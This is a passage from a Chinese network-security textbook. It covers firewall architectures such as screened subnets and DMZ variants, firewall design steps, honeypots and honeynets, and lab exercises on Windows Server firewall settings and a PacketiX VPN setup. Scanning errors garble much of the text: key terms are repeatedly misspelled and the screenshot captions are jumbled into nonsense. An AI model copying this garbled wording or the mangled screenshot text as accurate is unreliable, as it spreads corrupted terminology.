备 。 总 体 来 说 ,这 种 结构 既 足 够 安全 ,又 能 保证 较为 完善 的 网 络 设置 。 屏 蔽 子 网 的 缺点 在 于 
需要 更 多 设备 ,造价 要 高 一 些 。 

屏蔽 子 网 结构 有 一 个 变种 ,如 图 8-23 所 示 。 只 需要 一 台 包 过 滤 或 者 状态 检测 包 过 滤 防 
火 墙 和 一 台 应 用 服务 代理 防火 墙 。 包 过 滤 防 火 墙 有 3 个 接口 ,分别 连接 外 部 网 络 、 内 部 网 络 
和 非 军事 区 。 堡 又 主机 和 可 能 的 Web、 邮 件 服务 器 放置 于 非 军事 区 中 。 

相 比 普通 的 屏蔽 子 网 结构 ,这 种 简化 后 的 结构 需要 的 设备 更 少 (与 屏蔽 单 宿 堡垒 主机 一 
样 ) ,造价 自然 要 低 些 。 并 且 也 提供 放置 Web 服务 器 之 类 设备 的 区 域 ,综合 性 能 也 很 好 。 此 
种 结构 的 问题 也 是 在 于 其 实际 提供 的 是 单 层 防护 。 

实际 上 ,现在 市 面 上 多 数 的 硬件 防火 墙 设备 都 是 提供 DMZ 接口 的 三 接口 包 过 滤 防 火 
墙 。 内 部 网 络 与 DMZ 的 互 访 .DMZ 与 外 部 网 络 的 互 访 都 是 直接 以 硬件 作为 保障 的 。 基 于 
硬件 防火 墙 其 实 难以 轻易 攻破 ,对 于 普通 用 户 ,使 用 三 接口 硬件 防火 墙 设备 的 简化 版 屏蔽 子 
网 结构 也 是 非常 多 的 。 
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三 接口 包 过 滤 防 火 墙 


DMZ 


应 用 代理 防火 墙 


图 8-23 屏蔽 子 网 结构 的 变种 


8.3.6 创建 防火 墙 系统 的 步骤 


各 种 不 同行 业 和 机 构 需 要 不 同 用 途 的 内 部 网 络 , 如 校园 网 .企业 网 .政务 网 .军用 网 等 。 
不 同形 式 的 网 络 对 安全 的 需求 是 有 差别 的 ,需要 采用 与 其 性 质 相 适应 的 安全 措施 。 在 完整 
的 网 络 安全 体系 中 ,保护 检测、 反应 、. 回 复 和 策略 与 管理 都 需要 考虑 。 而 防火 墙 作 为 保护 的 
重要 手段 ,是 不 可 或 缺 的 。 防 火 墙 的 方案 设计 是 网 络 构建 的 重要 环节 。 

要 做 好 一 个 网 络 安全 系统 的 设计 一 般 需 要 做 安全 需求 分 析 、 网 络 安全 设计 和 安全 策略 
设计 。 而 防火 墙 的 设计 是 其 中 重要 的 内 容 , 接 下 来 要 阅 述 这 些 步骤 中 一 些 与 防火 墙 设 计 相 
关 的 内 容 。 

1. 安全 需求 分 析 


安全 需求 分 析 需 要 了 解 网 络 性 质 和 其 应 用 性 质 , 以 分 析 其 安全 风险 和 安全 需求 ,从 而 决 
定 网 络 安全 措施 如 何 配置 ,这 自然 也 包括 防火 墙 设计 在 内 。 

(1) 开放 网 络 是 指 网 络 中 的 设备 会 与 公共 网 络 上 大 量 用 户 有 很 频繁 的 交流 ,其 中 存放 
的 信息 会 有 相当 大 的 数量 向 公共 网 络 公 开 。 例 如 , Web 服务 器 所 在 的 网 络 就 是 此 种 情况 。 
一 般 而 言 , 此 类 网 络 中 主机 都 会 采取 比较 严格 .充分 的 安全 措施 ,防火 墙 对 其 安全 的 重要 性 
相对 有 限 ,此 种 网 络 一 般 只 选用 屏蔽 路 由 器 结构 即 可 。 一 定 意义 上 来 说 ,屏蔽 子 网 结构 中 的 
DMZ 部 分 也 可 以 视 为 是 这 样 的 网 络 。 

(2) 专用 网 络 是 指 普通 的 企业 内 部 网 之 类 的 半 开 放 网 络 。 这 些 网 络 可 以 提供 其 所 在 
的 企 事业 单位 使 用 ,并 能 够 与 互联 网 连接 。 网 络 中 不 对 来 自 公 共 网 络 的 用 户 提供 资源 ， 
或 者 只 有 那些 被 信任 的 授权 用 户 提供 可 访问 资源 。 一 般 来 说 ,授权 用 户 对 资源 的 访问 多 
以 虚拟 专用 网 (VPN) 来 解决 。 此 种 网 络 会 根据 用 户 应 用 的 情况 和 安全 需要 来 考虑 防火 
墙 的 布置 。 

(3) 内 部 网 络 是 指 与 公共 网 络 有 物理 隔 开 的 网 络 ,由 于 与 公共 网 络 之 间 没 有 连接 ,也 就 
没有 普通 意义 上 的 内 外 网 之 间 的 防火 墙 需求 。 此 类 网 络 上 要 考虑 的 安全 问题 来 自 内 部 用 户 
的 非 授 权 访问 ,可 以 考虑 以 VLAN 访问 控制 .安全 审计 与 管理 等 防范 措施 ,一 些 情况 下 也 
可 以 考虑 在 内 部 网 络 的 不 同 部 分 之 间 安 装 符合 用 户 安 全 需要 的 防火 墙 。 

而 网 络 应 用 的 性 质 会 影响 到 安全 强度 的 需求 ,从 而 影响 到 应 该 使 用 何 种 防火 墙 , 尤 其 要 
看 网 络 中 是 否 存 放 关键 数据 。 
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比如 说 ,同样 可 以 视 为 专用 网 络 ,公司 网 络 和 网 吧 对 安全 需要 是 不 同 的 ,网 吧 里 面 基本 
没有 需要 控制 他 人 非 授权 访问 的 资源 ,而 公司 网 络 一 般 则 恰恰 相反 。 网 吧 如 果 采 用 防火 墙 ， 
一 般 使 用 屏蔽 路 由 器 即 可 。 而 公司 可 能 会 考虑 屏蔽 双 宿 堡垒 主 机 结构 ,如果 有 布置 Web 服 
务 器 之 类 的 需要 还 会 考虑 屏蔽 子 网 结构 。 

若是 内 部 网 络 ,也 会 有 依照 安全 需要 使 用 或 者 不 使 用 防火 墙 的 可 能 。 如 果 没 有 存放 重 
要 数据 的 服务 器 ,同时 网 络 规 模 也 不 大 可 以 不 配置 防火 墙 ,只 使 用 VLAN ,访问 控制 之 类 
的 手段 即 可 。 如 果 网 络 规模 比较 大 或 有 重要 服务 器 , 则 也 要 依据 情况 考虑 是 否 要 选择 防 
火 墙 。 

除了 对 网 络 及 其 应 用 的 分 析 , 客 户 具 体 的 安全 需求 也 需要 充分 考虑 ,在 双方 反复 交流 论 
证 的 过 程 中 , 甲 方 一 直 坚 持 的 要 求 也 是 很 重要 的 。 

2. 网 络 安全 设计 

在 确定 了 网 络 特性 .应 用 特性 ,以 及 一 些 用 户 的 安全 需求 后 便 可 以 进行 网 络 安全 设计 。 
其 中 关于 防火 墙 的 部 分 主要 包括 防火 墙 结构 的 确定 和 设备 的 选用 。 

前 面 介绍 过 的 一 些 防火 墙 结构 ,每 一 种 提供 的 保护 功能 和 设备 数量 (也 就 意味 着 系统 造 
价 ) 也 是 不 同 的 。 具 体 选择 什么 样 的 结构 与 网 络 和 安全 要 求 有 关 。 例 如 ,对 专用 网 来 说 ,如 
果 安 全 要 求 不 高 可 以 采用 屏蔽 路 由 器 或 双 宿 主机 网 关 , 在 满足 安全 需求 的 情况 下 有 利于 降 
低 系 统 费 用 。 在 安全 需求 较 高 的 时 候 可 以 使 用 屏蔽 双 宿 堡垒 主机 或 屏蔽 子 网 结构 。 如 果 网 
络 中 有 需要 向 外 部 网 络 提供 (如 Web 或 者 邮件 服务 ) 的 需求 , 则 屏蔽 子 网 是 较 好 的 选择 。 而 
屏蔽 子 网 结构 中 ,除了 在 DMZ 中 使 用 单 宿 堡垒 主 机 外 ,也 可 以 使 用 双 宿 堡垒 主机 , Web 服 
务 器 之 类 可 以 放置 于 堡垒 主机 和 外 部 包 过 滤 防 火 墙 之 间 。 

在 确定 了 防火 墙 结构 后 就 需要 选择 防火 墙 设备 。 防 火 墙 结构 确定 了 设备 的 数量 和 类 
型 ,而 具体 选取 什么 样 的 设备 则 要 看 网 络 对 带宽 、 时 延 的 要 求 。 需 要 选择 吞吐 量 、 时 延 等 指 
标 适 宜 的 设备 。 如 果 设 备 性 能 不 足 则 可 能 导致 网 络 性 能 下 降 , 如 果 性 能 过 好 则 可 能 需要 大 
量 的 费用 。 

采取 何 种 防火 墙 结构 、 采 用 何 种 性 能 的 设备 ,这 都 与 网 络 安 全 措施 的 其 他 部 分 相互 影 
响 , 需 要 迎合 安全 需求 和 受制 于 项 目 预 算 的 制约 。 

3. 安全 策略 设计 

在 确定 防火 墙 结构 , 选 定 设备 后 ,需要 为 防火 墙 设备 设计 安全 策略 与 规则 。 

例如 ,对 于 一 个 屏蔽 子 网 结构 的 防火 墙 来 说 。 外 部 包 过 滤 防 火 墙 需要 禁用 本 身 的 各 种 
服务 ; 主机 规则 为 允许 外 部 用 户 访问 屏蔽 子 网 中 的 Web 及 邮件 等 应 用 服务 器 和 应 用 代理 
防火 墙 , 即 需要 指定 DMZ 中 具体 哪些 IP 的 哪些 端口 可 以 被 外 部 访问 ; 设置 好 日 志 规则 , 供 
以 后 安全 审计 使 用 。 内 部 包 过 滤 防 火 墙 也 需要 禁止 本 身 服务 ; 主机 规则 为 运行 内 部 网 络 访 
问 屏蔽 子 网 中 各 种 设备 , 即 需 要 指定 内 部 网 络 中 具体 哪些 IP 可 以 访问 DMZ ,或 者 可 以 通过 
应 用 服务 代理 访问 哪些 外 部 服务 ; 设置 好 日 志 规则 。 保 又 主机 则 需要 规定 内 部 主机 可 以 访 
问 的 外 部 站 点 ; 并 确定 对 代理 连接 的 检查 规则 ; 设置 日 志 规 则 。 

此 外 ,还 有 类 似 对 ICMP 报 文 的 应 答 控制 ,阻截 或 者 不 应 答 特 定 报 文 避免 被 攻击 者 扫描 
活动 主机 ; 阻塞 ActiveX .Java Applets; 恰当 地 使 用 网 络 地 址 转换 等 设计 。 
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8.4 密 负 主机 与 坎 骗 网 络 


8.4.1 密 缸 主机 


密 铅 主机 是 一 种 专门 引诱 网 络 攻 击 的 资源 。 它 被 伪装 成 一 个 有 价值 的 攻击 目标 , 蜜 铅 
主机 设置 的 目的 就 是 吸引 别人 去 攻击 它 。 此 种 网 络 设备 的 意义 一 方面 在 于 吸引 攻击 者 的 注 
意 力 ,从 而 减少 对 真正 有 价值 目标 的 攻击 ; 另 一 方面 在 于 收集 攻击 者 的 各 种 信息 ,从 而 帮助 
网 络 所 有 者 更 加 了 解 攻击 者 的 攻击 行为 ,以 利于 更 好 地 防御 。 蜜 镀 主 机 是 网 络 中 可 以 选择 
的 一 种 安全 措施 。 

蜜 饶 主 机 上 一 般 不 会 运行 任何 具有 实际 意义 且 能 产生 通信 流量 的 服务 。 所 以 ,任何 与 
泌 钢 主机 发 生 的 通信 流量 都 是 可 疑 的 。 通 过 收集 和 分 析 这 些 通 信 流 量 ,可 以 为 网 络 所 有 者 
提供 很 多 攻击 者 有 意义 的 信息 。 

就 收集 攻击 者 信息 的 能 力 和 本 身 的 安全 性 来 说 ,可 以 通过 蜜 鸟 主机 的 连累 等 级 来 将 它 
们 分 为 低 连 累 等 级 蜜 把 主机 、 中 连累 等 级 蜜 钠 主 机 、 高 连累 等 级 密 钠 主机 。 

(1) 低 连 累 等 级 的 蜜 镀 主 机 只 提供 简单 的 伪装 功能 。 例 如 ,打开 80 端口 ,冒充 自己 运 
行 了 HTTP 服务 。 此 种 形式 的 蜜 把 主机 只 具有 吸引 攻击 行为 的 能 力 , 由 于 自身 无 法 对 连接 
请 求 做 出 任何 应 答 ,攻击 者 只 需要 连接 一 下 开启 的 端口 发 现 无 反应 就 可 能 收工 ,因此 其 迷惑 
攻击 者 和 收集 攻击 者 信息 的 能 力 十 分 有 限 。 而 由 于 攻击 者 也 无 法 同 这 样 的 系统 产生 交互 ， 
难以 实施 有 效 攻击 ,其 本 身 的 安全 性 比较 高 。 

(2) 中 连累 等 级 的 蜜 钠 主 机 提供 一 些 伪 装 服务 ,能 够 让 用 户 与 其 产生 一 定 的 交互 。 对 
于 攻击 者 的 吸引 力 和 信息 收集 会 做 得 比 低 连累 等 级 蜜 缸 主机 好 得 多 。 这 样 的 蜜 缸 主机 ,其 伪 
装 的 服务 比 低 连累 等 级 密 缸 主机 要 复杂 。 用 于 伪装 的 程序 需要 足够 的 安全 ,不 能 有 常见 的 容 
易 受 攻击 的 漏洞 。 所 以 其 上 运行 系统 的 开发 要 困难 得 多 。 密 把 主机 自身 运行 起 来 也 很 安全 。 

(3) 高 连累 等 级 的 蜜 镀 主机 用 真实 的 系统 为 攻击 者 提供 “ 实 实在 在 ”的 服务 ,从 而 有 最 强 的 
吸引 攻击 者 并 收集 其 信息 的 能 力 。 但 攻击 者 有 控制 蜜 鸟 主机 并 借 由 其 访问 更 多 本 地 资源 的 可 
能 ,高 连累 等 级 的 蜜 镀 主机 也 有 高 的 危险 性 ,其 本 身 有 可 能 成 为 网 络 的 一 个 漏洞 。 所 以 ,对 高 连 
累 等 级 的 蜜 钠 主 机 需要 有 严密 的 监控 ,防止 其 被 攻陷 后 成 为 黑客 对 网 络 进一步 攻击 的 跳板 。 

不 同 连累 等 级 蜜 驴 主机 的 特点 比较 如 表 8-6 所 示 。 

表 8-6 不 同 连累 等 级 密 缸 主机 特点 比较 


选 项 特 点 
连累 等 级 低 下 高 
真实 操作 系统 次 否 是 
开发 难度 低 高 中 
交互 能 力 低 中 高 
信息 收集 层面 连接 应 用 请 求 全 面 
运行 所 需 知识 低 低 高 
维护 时 间 低 低 高 
安全 风险 低 低 高 
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蜜 饶 主 机 的 位 置 选择 对 其 功能 也 是 有 很 大 影响 的 。 蜜 缸 主机 的 位 置 选择 主要 是 相对 于 
防火 墙 而 言 的 。 不 同 的 位 置 选择 可 以 有 不 同 的 效果 。 就 普通 用 户 常用 的 最 复杂 的 屏蔽 子 网 
防火 墙 结构 而 言 , 蜜 缸 主 机 可 以 布置 在 防火 墙 之 外 .DMZ 区 或 内 部 网 络 。 

布置 于 防火 墙 之 外 的 蜜 缸 主机 主要 致力 于 吸引 和 收集 与 外 部 攻击 者 相关 的 攻击 。 其 对 
于 网 络 上 同时 配备 的 其 他 安全 措施 ,如 防火 墙 , 和 人 侵 检测 系统 等 不 会 产生 影响 。 若 其 沦陷 对 
于 内 部 网 络 也 基本 没有 什么 影响 。 缺 点 是 无 法 定位 内 部 的 攻击 者 。 

布置 于 防火 墙 之 内 的 蜜 缸 主机 指向 内 部 的 攻击 者 ,对 于 外 部 的 攻击 行为 很 难 有 吸引 和 
收集 的 效果 。 若 其 沦陷 ,对 内 部 网 络 有 较 大 威胁 。 

布置 于 DMZ 之 上 的 蜜 镀 主 机 对 内 外 网 络 都 可 以 有 好 的 攻击 吸引 和 资料 收集 效果 ,从 
位 置 来 说 ,最 为 理想 。 但 是 , 蜜 缸 主机 上 会 有 很 多 伪装 服务 ,需要 修改 内 外 包 过 滤 防火 墙 
的 规则 以 保证 其 可 以 被 访问 。 而 若 其 沦陷 ,不 仅 对 于 同 在 DMZ 内 的 其 他 服务 器 是 一 种 
威胁 ,由 于 其 与 内 部 网 络 间 的 通信 被 内 部 包 过 滤 防 火 墙 所 允许 ,对 内 部 网 络 也 是 一 种 
威胁 。 


8.4.2 欺骗 网 络 


蜜 饶 主 机 会 通过 模拟 某 些 常见 的 服务 ,常见 的 漏洞 来 吸引 攻击 ,使 其 成 为 一 台 “* 牢 笼 ” 
(CCage) 主 机 。 但 蜜 饶 主 机 毕竟 是 单 台 主机 ,本 身 无 法 控制 外 出 的 通信 流 。 要 达到 这 样 的 目 
的 ,需要 防火 墙 等 设备 配合 才能 对 通信 流 进行 限制 。 这 样 便 演化 成 一 种 更 为 复杂 的 网 络 欺 
骗 环境 ,被 称 为 欺骗 网 络 (HoneyNet)。 一 个 典型 的 欺骗 网 络 包 含 多 台 蜜 钠 主 机 及 防火 墙 来 
记录 和 限制 网 络 通信 流 。 通 常 还 会 与 人 侵 检测 系统 紧密 联系 ,以 发 现 潜在 的 攻击 。 

比较 单一 的 蜜 缸 主机 ,欺骗 网 络 有 更 大 的 优势 。 

首先 ,欺骗 网 络 是 一 个 网 络 系统 ,而 不 是 单一 主机 。 整 个 系统 隐藏 在 防火 墙 后 面 ,可 以 
使 用 各 种 不 同 的 操作 系统 及 设备 ,运行 不 同 的 服务 。 在 欺骗 网 络 中 的 所 有 主机 都 可 以 是 标 
准 的 机 器 ,上 面 运行 的 都 是 真实 完整 的 操作 系统 及 应 用 程序 。 这 样 建立 的 网 络 环境 看 上 去 
会 更 加 真实 可 信 。 

另外 ,通过 在 蜜 铅 主 机 之 前 设置 防火 墙 ,所 有 进出 网 络 的 数据 都 被 监视 、 截 获 及 控制 。 
并 用 以 分 析 黑 客 团体 使 用 的 工具 方法 及 动机 。 这 大 大 降低 因为 蜜 钠 主 机 所 带 来 的 额外 安 
全 风险 。 而 所 有 蜜 饶 主 机 的 审计 可 以 通过 集中 管理 方式 来 实现 ,除了 便于 分 析 ,还 可 确保 这 
些 数 据 的 安全 。 

但 是 欺骗 网 络 的 建设 和 维护 更 为 复杂 ,投入 更 大 。 欺 骗 网 络 也 不 能 解决 所 有 的 安全 问 
题 。 只 有 对 各 种 安全 策略 及 程序 都 进行 适当 优化 ,才能 尽 可 能 地 降低 风险 ,让 欺骗 网 络 发 挥 
最 大 的 效用 。 


ETE Windows Server 防火 墙 配 置 


/ 实 训 目的 
1. 加 深 对 防火 墙 认识 。 
2. 掌握 Windows 防火 墙 的 基本 功能 。 
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/ 实 训 环境 

Windows Server 2012 R2 操作 系统 。 
/ 实 训 内 容 

1. 防火 墙 的 开启 与 关闭 。 

2. Windows 防火 墙 基本 设置 。 
3，Windows 防火 墙 高 级 规则 设置 。 
/ 实 训 步 又 

1. 防火 墙 的 开启 与 关闭 


在 “开始 ”菜单 中 选择 “控制 面板 ”命令 ,然后 在 “控制 面板 ”窗口 中 选择 “系统 和 安全 ” 选 
项 ,再 单 击 "Windows 防火 墙 ? 超 链接 ,进入 防火 墙 管理 界面 ,如 图 8-24 所 示 。 


图 四 1 人 | 辐 “ 系 坟 和 安全 ， Windows 防火 培 Y | | 理 要 这 本 板 2D 
文件 (有 编 纺 (5) ”可 看 V) 工具 (T) 帮助 (H) 
各 四 民主 使 用 Windows 防火 墙 来 帮助 保护 你 的 电脑 


Windows 防火 培 有 助 于 防止 黑客 或 悉 过 软件 通过 Internet 或 网 络 访问 你 的 
多 许 应 用 或 功能 通过 Windows 。。 电脑 


网 更 SAR 年 入 专用 网 络 (R) 已 连接 O 
加 启用 或 关闭 Windows 防火 培 


你 0 道 且 信任 的 用 户 和 设备 所 在 的 家 庭 或 工作 网 络 
鸭 还 原由 人 值 = 
国 训 gis 生 Windows 防火 墙 状态 : 启用 
对 网 络 进行 疑难 解答 传 入 连接 : 阻止 所 有 与 未 在 克 许 应 用 列表 中 的 应 
用 的 连接 
活动 专用 网 络 : 室 网 各 4 
通知 状态 : Windows 防火 坪 阳 止 新 应 用 时 不 要 
通知 牧 
围 贸 # 二 或 人 有 mp) 未 二 接 回 


图 8-24 防火墙 管理 界面 

单 击 左 侧 的 “启用 或 关闭 Windows 防火 墙 ?或 者 “更 改 通知 设置 ?链接 ,就 可 以 进入 防火 
墙 开 启 .关闭 界面 ,如 图 8-25 所 示 。 

由 图 8-25 可 知 , Windows 防火 墙 的 私有 网 络 和 公用 网 络 的 配置 是 分 开 的 ,在 启用 
Windows 防火 墙 中 还 有 以 下 两 个 复 选 框 。 

(1)“ 阻 止 所 有 传人 连接 ,包括 位 于 允许 应 用 列表 中 的 应 用 ” 复 选 框 ,一 般 情况 下 按照 默 
认 设 置 ,不 必 选 中 该 复 选 框 ,否则 可 能 会 影响 允许 应 用 列表 中 的 一 些 应 用 使 用 网 络 。 

(2) “Windows 防火 墙 阻止 新 应 用 时 通知 我 " 复 选 框 ,该 复 选 框 一 般 可 以 选中 ,方便 用 户 
获知 情况 ,并 自己 做 出 判断 。 

如 果 需 要 关闭 防火 墙 ,只 需要 选中 对 应 网 络 类 型 中 的 “关闭 Windows 防火 墙 * 单 选 按 
钮 ,然后 单 击 “确定 "按钮 即 可 。 
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图 二 -+ | 辐 < Windows 防火 培 所 定义 设置 v 0 | [ 扩 二 这 面板 
文件 (篇 台 (查看 M) 工具 Mm 帮助 (H) 


自 定义 各 类 网 络 的 设置 
你 以 修改 使 用 的 每 种 类 型 的 网 络 的 防火 增设 和 
专用 网 络 设置 一 — 
国 启用 Windows 防火 培 
口 阻 上 所 有 传 入 连接 ,包括 位 于 允许 应 用 列表 中 的 应 用 
口 windows 防火 壤 阴 止 新 应 用 时 通知 我 


[x) 口 关闭 Windows 防火 境 ( 不 推 种) 
公用 网 络 设置 
移 windows 肪 x* 培 


口 阻止 所 有 传 入 连接 , 包括 位 于 允许 应 用 列表 中 的 应 用 
口 Windows 防火 雯 阻止 新 应 用 时 通知 我 


轩 o 关 window ppyearRe 梧 


图 8-25 防火墙 开启 .关闭 界面 


2. 防火 墙 规则 设置 


在 图 8-24 显示 界面 的 左 侧 单 击 “ 允 许 应 用 或 功能 通过 Windows 防火 墙 ” 链 接 , 将 进入 
防火 墙 基本 规则 设置 界面 ,如 图 8-26 所 示 。 


图 下 -个 | 辐 < Windows 防 K 堵 ， 允 的 应 用 
文 (KR 编 纺 (E) 查看 V) 工具 mT) 帮助 (H) 


允许 应 用 通过 Windows 防火 墙 进行 通信 


口 对 等 用 WSD 

口 BranchCache - 内 容 检索 ( 使 用 HTTP) 

口 BranchCache - 托管 组 存 服务 器 (使 用 HTTPS) 
口 BranchCache - 托管 矮 存 客户 读 ( 使 用 HTTPS) 
回 cas 认 证 测试 

口 COM+ 网 络 访问 

口 COM+ 远程 管理 

口 iscsi 服务 

回 LiveUpdate360 

口 Netlogon 服务 

口 SMBDirect 上 的 文件 和 打印 机 共享 


图 8-26 防火墙 基 本 规则 设置 界面 
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在 这 里 用 户 可 以 设置 某 个 具体 的 应 用 程序 对 网 络 访问 的 规则 。 设 置 其 是 否 可 以 访问 网 
络 , 以 及 可 以 访问 哪个 网 络 。“ 名 称 ” 选 项 区 域 中 的 程序 都 是 Windows 系统 自 带 的 一 些 应 
用 ,如 果 用 户 想 要 添加 更 多 应 用 程序 的 许可 规则 ,可 以 通过 “允许 其 他 应 用 ”按钮 进行 添加 ， 
添加 应 用 界面 如 图 8-27 所 示 。 


本 Apabi Reader 43 
您 Internet Explorer 

图 ,ava Mission Control 
贺 wyedipse 10 


萎 Uninstall MyEclipse 10 
国 Windows PowerShell 


图 8-27 添加 应 用 界面 


用 户 在 此 选择 要 设置 网 络 访问 规则 的 程序 ,如 果 “ 应 用 ”选项 区 域 中 没有 所 需要 的 程序 ， 
可 以 单 击 “浏览 ?按钮 找到 该 应 用 程序 .“ 网 络 类 型 "按钮 用 于 选择 该 程序 可 以 使 用 专用 和 公 
用 网 络 的 选项 。 

添加 的 程序 访问 网 络 规则 若 需要 删除 (如 因原 程序 已 经 印 载 了 等 ) , 则 只 需要 在 图 8-26 
中 选中 对 应 的 程序 项 ,再 单 击 “ 删 除 ” 按 钮 即 可 。 系 统 自 带 的 各 个 程序 项 目 是 无 法 删除 的 ,只 
能 禁用 。 

3. Windows 防火 墙 高 级 规则 设置 

在 图 8-24 中 单 击 “ 高 级 设置 "链接 , 即 可 进入 防火 墙 高 级 设置 界面 ,如 图 8-28 所 示 。 

单 击 左 侧 的 “入 站 规则 ?链接 ,中 间 将 显示 所 有 与 具体 程序 相关 的 可 设置 的 内 容 。 与 前 
面 基本 设置 中 的 条 目 一 样 , 只 是 更 加 详细 。 入 站 规则 设置 界面 如 图 8-29 所 示 。 

在 人 站 规则 中 选择 一 个 条 目 双 击 或 者 选中 该 规则 后 单 击 右 侧 的 “属性 条目, 即 可 开始 
对 程序 的 人 站 规则 进行 设置 ,如 图 8-30 所 示 。 

在 图 8-30 中 ,一 些 基本 设置 的 内 容 如 下 。 

(1) 常规 : 该 部 分 包含 规则 的 标识 与 描述 信息 。 可 以 启动 或 禁用 规则 ,操作 部 分 只 有 
3 个 单 选 按钮 : 允许 连接 、 只 允许 安全 连接 、 阻 止 连接 。 其 中 “只 允许 安全 连接 ” 单 选 按钮 ， 
用 户 可 以 自 定义 安全 连接 条 件 。 若 选中 “要 求 对 连接 进行 加 密 ” 单 选 按钮 , 则 还 应 该 在 防火 
墙 的 连接 安全 规则 中 进一步 定义 类 似 IPSec 协议 之 类 与 安全 连接 相关 的 内 容 。 
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Em 


进 高 绷 安 全 时 ndows 防火 十 为 旦 adows 计算 机 提供 网 络 安全 。 


概述 

域 配置 文件 

加 Nindoxs 防火 墙 已 启用 。 

人 阻 上 与 规则 不 四 配 的 入 法 连接 。 
多 许 与 规 RT RA 出 站 连接 。 
专用 配置 文件 是 活动 的 

加 Windors 防火 墙 已 启用 。 

人 阻 上 与 规则 不 四 本 的 入 法 连接 。 
人 @ 了 f 许 与 规 RI 下 四 本 89 出 让 连接 。 
公用 配置 文件 

加 windows 防火 墙 已 启用 。 

人 阻 目 与 规则 不 四 醒 的 入 沾 连 接 。 
加 4f 许 与 规 RI 下 四 本 的 出 沾 广 接 。 
图 windovs 防火 墙 属性 


名 称 组 配置 文件 a| 
加 3605 缩 专用 
@ic0E8 专用 FE 
@350F% 域 
O30 域 
加 casiER 江 所 有 
加 tveupdate360 专用 
加 Lveupdate360 专用 
@ Tencent Download program 专用 
@ Tencent Download Program 专用 


cat 


ie 
EF 


部 加 加 各 训 加 加 训 训 加 
四 加 Xi 上 和 二 多 


图 8-29 入 站 规则 设置 界面 
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图 8-30 ”程序 入 站 规则 设置 


(2) 远程 计算 机 : 该 部 分 可 以 指定 哪些 远程 计算 机 可 以 与 该 程序 进行 网 络 通信 。 

(3) 协议 和 端口 : 此 部 分 可 以 设置 该 程序 与 网 络 交流 的 流量 ,可 以 执行 的 协议 和 访问 
的 端口 ,用 户 在 此 指明 哪些 协议 与 端口 是 被 允许 的 。 此 部 分 设置 与 基本 包 过 滤 防 火 墙 的 规 
则 设置 类 似 。 


《ID 措 建 PacketiX VEN 


/ 详 训 目的 
1. 加 深 对 VPN 的 认 知 了 解 。 
2. 学 习 使 用 PacketiX VPN 搭建 企业 VPN。 


/ 实 训 环境 
网 络 环境 ,两 台 Windows 操作 系统 计算 机 ,一 台 用 作 服务 器 ,一 台 用 作客 户 机 。 
/ 实 训 内 容 


1. PacketiX VPN 服务 器 。 
2. PacketiX VPN 客户 端 配置 。 


V 实 训 步 票 
1. PacketiX VPN 服务 器 
PacketiX VPN 是 北京 大 游 索 易 科技 有 限 公司 的 VPN 产品 ,是 较为 广泛 使 用 的 企业 
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VPN 软件 ,现在 最 新 的 版 本 是 4. 24。 用 户 可 以 在 其 官网 (http://www. packetix-download. 
com/cn. aspx) 选 择 产 品 下 载 。 服 务 器 端 和 客户 端 需要 分 别 下 载 。 

(1) 服务 器 端 软件 的 安装 和 配置 。 运 行 安装 程序 ,选择 PacketiX VPN Server 组 件 进行 
安装 ,如 图 8-31 所 示 。 


B 贸 PacketiX VPN Bridge 
MPacketix VPN Server 管理 工具 ( 仅 限 管理 工具 ) 


关于 PacketiX VPN Server 
贸 把 它 安装 在 服务 器 计算 机 上 作为 VPN 的 中 心 站 点 。 管 理工 具 也 会 同时 安装 。 


[CE | wm | 


图 8-31 选择 要 安装 的 组 件 


(2) 接受 许可 协议 、 选 择 安装 路 径 , 逐 步 完 成 服务 器 端 程序 安装 。 启 动 PacketiX Server 
管理 器 ,如 图 8-32 所 示 ,选择 * 本 地 主机 (此 服务 器 ) ”, 单 击 “ 连 接 ” 按 钮 , 即 可 管理 本 机 上 的 
VPN Server 服务 。 初 次 安装 时 ,需要 设置 管理 密码 。 


SS ge 
VPN Server Manager verion+.0 


PacketiX VPN Server 连接 设置 (3) 
WEY Server 或 VPN Bridse 的 连接 设置 被 定义 如 下 。 双击 该 项 以 连接 到 
法 加 新 连接 ， 单 击 “ 新 设置 ”。 


设置 名 称 VPN Server 主机 操作 模式 
caTRost Vv 


图 8-32 PacketiX Server 管理 器 
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(3) 进入 后 可 以 利用 其 向 导 ( 简 单 安装 ) ,建立 一 个 基本 的 远程 访问 使 用 的 HUB, 如 
图 8-33 所 示 。 


局 PacketiX VPN Server / Bridge 简单 安装 
疯 和 凡生 radketix Vel Server 或 TI Bridee。 退出 安 装 后 ， 您 可 以 使用 WE Surver 管 四 


选择 你 要 构建 的 VPN Server 类 型 。 可 以 一 起 选择 多 种 类 型。 


回 运 程 访问 VPN Server (8) 
高 疯 YPN Server 允许 VPN client 计算 机 远程 访问 现 有 的 以 太 网 段 ， 如 公司 局 域 


i 的 任何 VP Client 都 能 访问 型 网络 ， 就 依 他 们 直接 的 、 物 理 的 连 


口 站 点 到 站 点 YPW Server 或 YPN Bridge(S) 


Se 


选择 这 个 VPN Server 的 作用 
口 从 其 他 让 点 接受 连接 YPN Server (中 心 ) (5) 
口 每 个 站 点 (站 点 喘 ) 的 YPN Server 或 YPN Briage (E) 


口 Ye 的 其 他 高 级 配置 
如 果 你 计划 构建 具有 高 级 功能 的 VPN 系统 ,如 群集 功能 和 虚拟 3 层 交 换 功能 ， 请 选择 本 项 。 


点 击 “下 一 步 ” 开 好 安装。 如果 你 想 通 出 安装 并 手动 配置 所 有 设置 ， 请 单 击 “ 关 闭 "”。 


图 8-33 ”PacketiX VPN Server 简单 安装 


(4) 在 主 界面 中 (图 8-34) 双 击 建立 起 来 的 HUB, 对 其 进行 管理 (图 8-35)。 


贸 管理 VPN Server “localhost” 


[ 口 > 
[0 | [| [GO | [OO | | Rw | [WO 


管理 监听 凑 () YPN Server 和 了 网络 信 息 和 设置 (加 
监听 器 列表 (TCP/IP 端口 ) (DD): 


群集 可 置 他 ) 


群集 杖 态 (2) 


当前 DDNS 主机 名 : vpn405603506.sedns.cn 


图 8-34 HUB 管理 主 界面 
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虚拟 HUB “myVPN” 此 虚拟 YIB 当前 扶 态 他): 
管理 安全 数据 库 (D) : 


8 CC wg 


添加 ， 旺 除 或 编辑 用 户 账户 。 


四 类 独 
加 SeremhT 机 能 


添加 ， 出 除 或 编辑 组 * 


@ Cr 


添加 是 除 访问 列表 (过 据 包 过 江 规 风 ) 。 


刷新 (0 
虚拟 us 设置 (0) 


0 ER 向 EE 


Er 本 村 日 志保 让 功能 的 设置 
ET ER 


用 WE 管理 可 信 的 CA 证 书 。 
